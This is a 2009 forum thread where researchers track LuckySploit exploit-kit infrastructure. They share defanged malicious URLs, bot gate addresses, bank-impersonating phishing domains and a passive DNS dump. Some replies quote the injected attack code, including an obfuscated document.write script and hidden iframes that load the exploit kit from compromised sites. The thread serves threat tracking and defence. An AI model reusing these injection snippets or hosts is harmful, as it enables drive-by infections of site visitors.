Author Topic: another Luckysploit IP  (Read 45509 times)

0 Members and 1 Guest are viewing this topic.

April 27, 2009, 09:53:43 pm
Reply #45

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
Code: [Select]
hxxp://firstplumb.info/clicksagent2/?t=1&

wepawet fails to analyze this one (URL 404 not found)

Use jsunpack

April 28, 2009, 07:26:51 am
Reply #46

mercutio

  • Special Members
  • Full Member

  • Offline
  • *

  • 52

April 28, 2009, 05:23:14 pm
Reply #47

michajp

  • Full Member

  • Offline
  • ***

  • 59
Hello,

Code: [Select]
hxxp://usbanks.server-17.us/bb/?t=2

Micha

April 28, 2009, 05:55:07 pm
Reply #48

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://federalreservebanks.safe-connect.us/bb/?t=2

April 28, 2009, 06:25:02 pm
Reply #49

CM_MWR

  • Special Members
  • Hero Member

  • Offline
  • *

  • 319
Code: [Select]
habrion.cn/in.cgi?3
habrion.cn/lyre/?t=2
habrion.cn/lyre/?1e1b04c40e61519d5f1462487914be7059bd5a76bd82fe3b598493fb47cd15011b6453cb8a25bbdd661b700805daafcbec370ca20fd35c99ebb4108a12c8d698
habrion.cn/lyre/?2922ad60ed42eb2f5e186870d8fe8ad6c84d24f9c29f5b476afe4967aa8cea27b2868035c23438aaa85d50310cc57e29a585c5c640e1eb0a7da917dd386e5933
habrion.cn/lyre/?66b3c685ec9fe6507351e9a007c7bdda110ddcbbdaffb702a8c47d83e10c7d057aa7c205170759158cfeef2b3e54dc307adb46a597277a03021daecb669f430b
habrion.cn/lyre/?52a9b7d8013738a1245946bc142735dbc32d658fb34ae643951c282ae406692c7c06bfd76500242a137b2af34722e1ffd5fb3bbec9673dfba590ab9951d2c9ed
habrion.cn/lyre/?h=5a.0gi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
bgbtorlopos.com/kitm5/gate.php?id=33c9961a
bgbtorlopos.com/bbv/juyjyuj5.exe
habrion.cn/bm_a/controller.php?action=bot&entity_list=&uid=2&first=1&guid=4108621338&rnd=123
habrion.cn/bm_a/controller.php?action=report&guid=0&rnd=123&uid=2&entity=1240225592:unique_start
habrion.cn/bm_a/controller.php?action=bot&entity_list=1240225592&uid=2&first=0&guid=4108621338&rnd=123
habrion.cn/bm_a/controller.php?action=report&guid=0&rnd=123&uid=2&entity=
bgbtorlopos.com/kitm5/gate.php?id=f4e4961a
aboutmmgftf.com/kitiktk5//data.php?phid=EA05C159D159C148C047BE36AD259D15&lg=ENU&user=DAMIT
aboutmmgftf.com/kitiktk5//info.php?ver=0.01&phid=EA05C159D159C148C047BE36AD259D15&lg=ENU

April 29, 2009, 06:07:19 am
Reply #50

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://usbanks.ebanks-net.us/34733/CM/wire/issue-127932/bb/?t=2
hxxp://usabanks.secureserver-32.us/31107/CM/wire/issue-127431/bb/?t=2
hxxp://federalreservebanks.central-security.us/32394/CM/wire/issue-127835/bb/?t=2
hxxp://federalreserve.secureserver-37.us/37594/CM/wire/issue-127231/bb/?t=2
hxxp://usbanks.1-secure.us/34846/CM/wire/issue-127333/bb/?t=2

April 29, 2009, 12:11:50 pm
Reply #51

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://federalreservebank.1-bank.us/30802/CM/wire/issue-127632/bb/?t=2

April 29, 2009, 12:43:05 pm
Reply #52

Mr Clean

  • Special Members
  • Hero Member

  • Offline
  • *

  • 331
Code: [Select]
hxxp://federalreservebank.1-bank.us/30802/CM/wire/issue-127632/bb/?t=2

anyone care to go fishing?

http://www.bfk.de/bfk_dnslogger.html?query=221.5.74.42#result

Code: [Select]
ns1.secureserver-1.us A 221.5.74.42
ns2.secureserver-1.us A 221.5.74.42
federalreservebanks.secureserver-1.us A 221.5.74.42
frbanks.secureserver-1.us A 221.5.74.42
usbanks.secureserver-1.us A 221.5.74.42
ustreasury.secureserver-1.us A 221.5.74.42
ns1.securenet-1.us A 221.5.74.42
ns2.securenet-1.us A 221.5.74.42
federalreserve.securenet-1.us A 221.5.74.42
ns1.secure-server1.us A 221.5.74.42
ns2.secure-server1.us A 221.5.74.42
federalreserve.secure-server1.us A 221.5.74.42
mail.secure-server1.us A 221.5.74.42
usabanks.secure-server1.us A 221.5.74.42
federalreservebanks.secure-server1.us A 221.5.74.42
frbanks.secure-server1.us A 221.5.74.42
usbanks.secure-server1.us A 221.5.74.42
treasurydept.secure-server1.us A 221.5.74.42
www.secure-server1.us A 221.5.74.42
ustreasury.secure-server1.us A 221.5.74.42
ns1.server-22.us A 221.5.74.42
ns2.server-22.us A 221.5.74.42
federalreservebank.server-22.us A 221.5.74.42
federalreservebanks.server-22.us A 221.5.74.42
frbanks.server-22.us A 221.5.74.42
usbanks.server-22.us A 221.5.74.42
treasurydept.server-22.us A 221.5.74.42
ustreasury.server-22.us A 221.5.74.42
ns1.secureserver-32.us A 221.5.74.42
ns2.secureserver-32.us A 221.5.74.42
federalreservebank.secureserver-32.us A 221.5.74.42
mail.secureserver-32.us A 221.5.74.42
federalreservebanks.secureserver-32.us A 221.5.74.42
www.secureserver-32.us A 221.5.74.42
ustreasury.secureserver-32.us A 221.5.74.42
ns1.server-23.us A 221.5.74.42
ns2.server-23.us A 221.5.74.42
federalreserve.server-23.us A 221.5.74.42
federalreservebank.server-23.us A 221.5.74.42
federalreservebanks.server-23.us A 221.5.74.42
frbanks.server-23.us A 221.5.74.42
usbanks.server-23.us A 221.5.74.42
treasurydept.server-23.us A 221.5.74.42
ustreasury.server-23.us A 221.5.74.42
ns1.secureserver-23.us A 221.5.74.42
ns2.secureserver-23.us A 221.5.74.42
federalreservebanks.secureserver-23.us A 221.5.74.42
ns1.secureserver-33.us A 221.5.74.42
ns2.secureserver-33.us A 221.5.74.42
ns1.secureserver-4.us A 221.5.74.42
ns2.secureserver-4.us A 221.5.74.42
federalreserve.secureserver-4.us A 221.5.74.42
mail.secureserver-4.us A 221.5.74.42
usabanks.secureserver-4.us A 221.5.74.42
federalreservebanks.secureserver-4.us A 221.5.74.42
usbanks.secureserver-4.us A 221.5.74.42
www.secureserver-4.us A 221.5.74.42
ns1.secureserver-34.us A 221.5.74.42
ns2.secureserver-34.us A 221.5.74.42
federalreservebank.secureserver-34.us A 221.5.74.42
ns1.secureserver-44.us A 221.5.74.42
ns2.secureserver-44.us A 221.5.74.42
frbanks.secureserver-44.us A 221.5.74.42
ns1.secureserver-55.us A 221.5.74.42
ns2.secureserver-55.us A 221.5.74.42
mail.secureserver-55.us A 221.5.74.42
fedbanks.secureserver-55.us A 221.5.74.42
usbanks.secureserver-55.us A 221.5.74.42
www.secureserver-55.us A 221.5.74.42
ns1.secureserver-6.us A 221.5.74.42
ns2.secureserver-6.us A 221.5.74.42
frbanks.secureserver-6.us A 221.5.74.42
ns1.server-17.us A 221.5.74.42
ns2.server-17.us A 221.5.74.42
federalreserve.server-17.us A 221.5.74.42
federalreservebank.server-17.us A 221.5.74.42
treasurydept.server-17.us A 221.5.74.42
ns1.secureserver-27.us A 221.5.74.42
ns2.secureserver-27.us A 221.5.74.42
federalreserve.secureserver-27.us A 221.5.74.42
fedbanks.secureserver-27.us A 221.5.74.42
federalreservebanks.secureserver-27.us A 221.5.74.42
frbanks.secureserver-27.us A 221.5.74.42
ns1.secureserver-37.us A 221.5.74.42
ns2.secureserver-37.us A 221.5.74.42
federalreserve.secureserver-37.us A 221.5.74.42
ns1.server-18.us A 221.5.74.42
ns2.server-18.us A 221.5.74.42
treasurydept.server-18.us A 221.5.74.42
ns1.secureserver-28.us A 221.5.74.42
ns2.secureserver-28.us A 221.5.74.42
federalreserve.secureserver-28.us A 221.5.74.42
mail.secureserver-28.us A 221.5.74.42
frbanks.secureserver-28.us A 221.5.74.42
treasurydept.secureserver-28.us A 221.5.74.42
www.secureserver-28.us A 221.5.74.42
ns1.server-19.us A 221.5.74.42
ns2.server-19.us A 221.5.74.42
federalreservebank.server-19.us A 221.5.74.42
fedbanks.server-19.us A 221.5.74.42
federalreservebanks.server-19.us A 221.5.74.42
ustreasury.server-19.us A 221.5.74.42
ns1.secureserver-39.us A 221.5.74.42
ns2.secureserver-39.us A 221.5.74.42
usabanks.secureserver-39.us A 221.5.74.42
federalreservebanks.secureserver-39.us A 221.5.74.42
usbanks.secureserver-39.us A 221.5.74.42
treasurydept.secureserver-39.us A 221.5.74.42
ns1.1-secure.us A 221.5.74.42
ns2.1-secure.us A 221.5.74.42
federalreserve.1-secure.us A 221.5.74.42
usabanks.1-secure.us A 221.5.74.42
treasurydept.1-secure.us A 221.5.74.42
ustreasury.1-secure.us A 221.5.74.42
ns1.1-bank.us A 221.5.74.42
ns2.1-bank.us A 221.5.74.42
mail.1-bank.us A 221.5.74.42
usabanks.1-bank.us A 221.5.74.42
fedbanks.1-bank.us A 221.5.74.42
federalreservebanks.1-bank.us A 221.5.74.42
frbanks.1-bank.us A 221.5.74.42
treasurydept.1-bank.us A 221.5.74.42
www.1-bank.us A 221.5.74.42
ustreasury.1-bank.us A 221.5.74.42
ns1.direct-ebank.us A 221.5.74.42
ns2.direct-ebank.us A 221.5.74.42
federalreservebank.direct-ebank.us A 221.5.74.42
usbanks.direct-ebank.us A 221.5.74.42
treasurydept.direct-ebank.us A 221.5.74.42
ns1.e-banks.us A 221.5.74.42
ns2.e-banks.us A 221.5.74.42
usabanks.e-banks.us A 221.5.74.42
fedbanks.e-banks.us A 221.5.74.42
ns1.safe-connect.us A 221.5.74.42
ns2.safe-connect.us A 221.5.74.42
federalreserve.safe-connect.us A 221.5.74.42
federalreservebanks.safe-connect.us A 221.5.74.42
usbanks.safe-connect.us A 221.5.74.42
ustreasury.safe-connect.us A 221.5.74.42
ns1.e-directconnect.us A 221.5.74.42
ns2.e-directconnect.us A 221.5.74.42
federalreserve.e-directconnect.us A 221.5.74.42
federalreservebank.e-directconnect.us A 221.5.74.42
usabanks.e-directconnect.us A 221.5.74.42
fedbanks.e-directconnect.us A 221.5.74.42
federalreservebanks.e-directconnect.us A 221.5.74.42
ustreasury.e-directconnect.us A 221.5.74.42
ns1.banks-net.us A 221.5.74.42
ns2.banks-net.us A 221.5.74.42
federalreservebank.banks-net.us A 221.5.74.42
mail.banks-net.us A 221.5.74.42
federalreservebanks.banks-net.us A 221.5.74.42
www.banks-net.us A 221.5.74.42
ustreasury.banks-net.us A 221.5.74.42
ns1.ebanks-net.us A 221.5.74.42
ns2.ebanks-net.us A 221.5.74.42
federalreserve.ebanks-net.us A 221.5.74.42
fedbanks.ebanks-net.us A 221.5.74.42
usbanks.ebanks-net.us A 221.5.74.42
treasurydept.ebanks-net.us A 221.5.74.42
ns1.1-security.us A 221.5.74.42
ns2.1-security.us A 221.5.74.42
usabanks.1-security.us A 221.5.74.42
fedbanks.1-security.us A 221.5.74.42
federalreservebanks.1-security.us A 221.5.74.42
frbanks.1-security.us A 221.5.74.42
ns1.central-security.us A 221.5.74.42
ns2.central-security.us A 221.5.74.42
federalreserve.central-security.us A 221.5.74.42
fedbanks.central-security.us A 221.5.74.42
federalreservebanks.central-security.us A 221.5.74.42
frbanks.central-security.us A 221.5.74.42
ustreasury.central-security.us A 221.5.74.42

April 29, 2009, 12:57:14 pm
Reply #53

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
Just a quick note...exactly two ips earlier -> proxim.ircgalaxy.pl  ;)
http://www.bfk.de/bfk_dnslogger.html?query=221.5.74.40#result
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

May 03, 2009, 04:31:54 pm
Reply #54

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
redirects to luckysploit on 85.17.189.183
Code: [Select]
hxxp://antivirus.vc
Wepawet

with this

Quote
if (!myia){
  document.write(unescape('
%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61
%6e%74%69%76%69%72%75%73%2e%76%63%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68
%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%31%39%32%30%29%2b%27%38%39%61%61%35%34%66%66%35%27%20
%77%69%64%74%68%3d%37%33%30%20%68%65%69%67%68%74%3d%33%30%34%20%73%74%79%6c%65%3d%27%76%69
%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));
}
var myia = true;

Quote
<iframe name=c26 src='hxxp://antivirus.vc/?'+Math.round(Math.random()*221920)+'89aa54ff5' width=730 height=304 style='visibility:hidden'></iframe>

May 05, 2009, 03:16:22 pm
Reply #55

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
209.44.100.58
Code: [Select]
hxxp://odegda.cv.ua/in.cgi?2&
hxxp://totalmic.if.ua/sx/?t=2

the exploit: Wepawet

May 12, 2009, 03:18:55 pm
Reply #56

michajp

  • Full Member

  • Offline
  • ***

  • 59
Code: [Select]
hxxp://ustreasury.federalbanksystem.net/31689/FRB/phishing/Issue~73841/
hxxp://ustreasury.federalbanks.us/33704/FRB/phishing/Issue~73624/
hxxp://usbanks.esecure-federal.us/38297/FRB/phishing/Issue~73818/
hxxp://federalreserve-online.com/31419/FRB/phishing/Issue~73574/
hxxp://federalreserve-online.com/37692/FRB/phishing/Issue~73680/
hxxp://federalreserve-online.us/34673/FRB/phishing/Issue~73208/
hxxp://ustreasury.federalbanks.us/36476/FRB/phishing/Issue~73412/
hxxp://ustreasury.federalbanksystem.us/35242/FRB/phishing/Issue~73040/
hxxp://federalreserve-direct.com/32347/FRB/phishing/Issue~73659/

May 12, 2009, 05:48:06 pm
Reply #57

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 15, 2009, 06:10:46 am
Reply #58

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
60.29.232.31
(theres 1 listed luckysploit on that IP)

Code: [Select]
sgariiista.com/bb/?t=3http://wepawet.iseclab.org/view.php?hash=ec4a50b766fdb421f468da5be992490b&t=1242367679&type=js

Code: [Select]
Bolelshiko.com/bb/?t=3
Iiikaolllxxx.net/bb/?t=3
Sdfiiixkoas.net/bb/?t=3
Mal-Aware

May 18, 2009, 09:21:34 pm
Reply #59

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
Several websites are pointing to the domain below with an IFRAME
Quote
<iframe src='hxxp://www.fujifork.co.jp/' width=1 height=1 style='visibility: hidden'></iframe>
<iframe src='hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b' width=1 height=1 style=
'visibility: hidden'></iframe>

compromised website used to spread LuckySploit:
Code: [Select]
hxxp://fujifork.co.jp
Wepawet

The IP hosting the LuckySploit:
Code: [Select]
hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b
Wepawet link (404 not found)
Jsunpack